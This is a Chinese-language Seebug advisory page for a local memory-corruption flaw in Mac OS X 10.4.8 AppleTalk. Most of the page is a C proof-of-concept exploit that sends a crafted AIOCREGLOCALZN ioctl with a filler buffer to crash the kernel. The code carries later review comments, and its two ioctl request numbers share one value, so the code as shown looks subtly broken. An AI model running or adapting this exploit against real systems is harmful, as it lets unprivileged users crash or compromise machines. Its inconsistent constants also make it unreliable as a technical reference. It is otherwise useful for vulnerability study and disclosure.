
seebugRootSSV:598

Apple Mac OS X AppleTalk 本地内存破坏漏洞

2006-11-29 00:00:00
Root
www.seebug.org

Apple Mac OS X是一款基于BSD的操作系统。

Apple Mac OS X AppleTalk存在一个内存错误，本地攻击者可以利用该漏洞使系统崩溃，或执行任意指令。

问题在于AIOCREGLOCALZN ioctl命令未正确验证输入数据：非特权用户可以打开一个AppleTalk套接字，并通过特殊构造的数据结构发送该ioctl控制命令来触发此漏洞。

Apple Mac OS X Server 10.4.8
Apple Mac OS X 10.4.8
目前尚未提供详细的解决方案，可关注厂商页面：

<a href="http://www.apple.com/macosx/" target="_blank">http://www.apple.com/macosx/</a>


                                                /*
 * Copyright 2006 (c) LMH &lt;[email protected]&gt;.
 * All Rights Reserved.
 * ----           
 *
 *               .--. .--.           _____________________________________
 *          _..-: (X :  o :-.._     / heya! me Gruber Duckie. I'm an 眉ber |
 *      .-''    `.__.:.__.'    ``-./___    proud zealot and Mac Beggar!   |
 *    .'          .'   `.          `.  \__________________________________|
 *   :  '.        :     :        .'  ;  (...fear my Delusional Zealot Army !)
 *   :    :-..__  `.___.'  __..-;    ;
 *   `.    `.   ''-------''   .'    ,'
 *     `.    `.             .'    .' 
 *       `._   `-._     _.-'   _.'   kudos to ilja, kevin, hdm, johnnycsh, et al.
 *          `-._   '&quot;'&quot;'   _.-'      proof of concept for MOKB-27-11-2006.
 *              ``-------''
 */

#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;
#include &lt;string.h&gt;
#include &lt;stdio.h&gt;
#include &lt;fcntl.h&gt;
#include &lt;stdarg.h&gt;
#include &lt;sys/param.h&gt;
#include &lt;sys/socket.h&gt;
#include &lt;sys/ioctl.h&gt;
#include &lt;sys/sockio.h&gt;

/*
 * Minimal stand-in for the kernel's AppleTalk global-state record: only the
 * flags word is read by this program (tested against AT_ST_STARTED).
 * NOTE(review): the real structure in netat/at_var.h may be larger than this
 * one word; nothing here depends on the rest of it -- confirm before reuse.
 */
typedef struct at_state {
	unsigned int	flags;	/* AT_ST_* bits; AT_ST_STARTED is the only one used */
} at_state_t;

/* if testing on PPC, you need to use the proper values. read netat/at_var.h */
/*
 * Hard-coded ioctl request numbers and address family, written for the
 * author's build rather than taken from the system headers.
 * NOTE(review): AIOCREGLOCALZN is given exactly the same value as
 * AIOCGETSTATE below, so both ioctl() calls in main() issue the same request
 * number -- check these constants against netat/at_var.h before drawing any
 * conclusion from a run of this program.
 */
#undef	AF_APPLETALK
#define AIOCGETSTATE	0x8021610b	/* get AT global state */
#define AIOCREGLOCALZN	0x8021610b	/* register local zone (same value as AIOCGETSTATE here) */
#define AT_ST_STARTED	0x0001		/* flags bit: AppleTalk stack has been started */
#define	AF_APPLETALK	0x10		/* overrides the system header's definition */

/* Filler buffer whose address is handed to the AIOCREGLOCALZN ioctl;
 * do_semtex() below fills it with repeated 0x61 words first. */
char powder[4096];

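/*
 * Fill the first len bytes of p with the object representation of the value
 * 0x61 held in an unsigned long, repeated word by word (on a little-endian
 * host that is 0x61 followed by zero bytes; the mirror image on big-endian).
 *
 * Fixes relative to the original loop:
 *  - the counter was a signed int compared against a size_t;
 *  - when len was not a multiple of sizeof(long) the final store ran past the
 *    end of p; the tail is now covered by a partial copy instead;
 *  - p was written through an unsigned long * cast, which is undefined for a
 *    misaligned char buffer; memcpy is used so alignment does not matter;
 *  - the return value was the address of the global `powder` regardless of p;
 *    it now returns p itself, which is what the only caller (main) passes.
 *
 * p:   destination buffer holding at least len bytes (may be NULL if len == 0).
 * len: number of bytes to fill.
 * Returns p converted to unsigned long, the form main() passes to ioctl().
 */
unsigned long do_semtex(char *p, size_t len) {
	const unsigned long fill = 0x61;
	const size_t word = sizeof fill;

	for (size_t off = 0; off < len; off += word) {
		/* last chunk may be shorter than one word; never write past len */
		size_t chunk = (len - off < word) ? len - off : word;
		memcpy(p + off, &fill, chunk);
	}

	return (unsigned long)p;
}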

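/*
 * Entry point of the MOKB-27-11-2006 proof of concept described on this page
 * (SSV:598): open an AppleTalk raw socket, verify that the AppleTalk stack is
 * started, then hand AIOCREGLOCALZN a buffer of filler bytes.  According to
 * the advisory text above, an affected 10.4.8 kernel does not validate that
 * argument and the machine crashes; on a fixed or unaffected system the ioctl
 * simply returns and any error it reports is printed.
 *
 * argc/argv are unused.
 * Exit status: 1 socket() failed, 2 AIOCGETSTATE failed, 3 AppleTalk is not
 * enabled, 0 the second ioctl returned control to the process.
 *
 * Fixes relative to the original: the state printf passed the whole struct
 * to %08x (undefined behaviour) and now prints global_state.flags; fd was
 * leaked on the exit(3) path; the result of the second ioctl was discarded.
 */
int main(int argc, char **argv) {
	at_state_t global_state;
	unsigned long pkt;
	int fd;

	(void)argc;
	(void)argv;

	fd = socket(AF_APPLETALK, SOCK_RAW, 0);
	if (fd < 0) {
		exit(1);
	}

	/* check if AppleTalk stack has been started */
	if (ioctl(fd, AIOCGETSTATE, &global_state) < 0) {
		close(fd);
		exit(2);
	}

	if (!(global_state.flags & AT_ST_STARTED)) {
		printf("appletalk-exploit-1: AppleTalk isn't enabled!\n");
		close(fd);
		exit(3);
	}
	printf("appletalk-exploit-1: 0x%08x\n", global_state.flags);

	/* the ioctl argument is the address of the filled global buffer,
	 * passed as an integer exactly as the original did */
	pkt = do_semtex(powder, sizeof(powder));
	if (ioctl(fd, AIOCREGLOCALZN, pkt) < 0) {
		perror("appletalk-exploit-1: ioctl(AIOCREGLOCALZN)");
	}

	close(fd);
	return 0;
}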